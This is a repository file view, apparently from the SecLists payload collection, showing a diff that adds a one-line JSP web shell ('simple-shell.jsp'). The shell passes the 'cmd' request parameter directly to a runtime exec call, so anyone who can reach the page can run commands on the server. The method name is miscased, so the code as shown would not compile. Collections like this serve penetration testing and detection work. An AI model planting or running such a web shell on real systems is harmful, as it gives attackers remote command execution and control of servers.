Files
SecLists/Payloads/JSP/simple-shell.jsp
2017-08-23 14:55:06 +01:00

4 lines
66 B
Plaintext

+<%
+Runtime.getruntime().exec(request.getParameter("cmd"))
+%>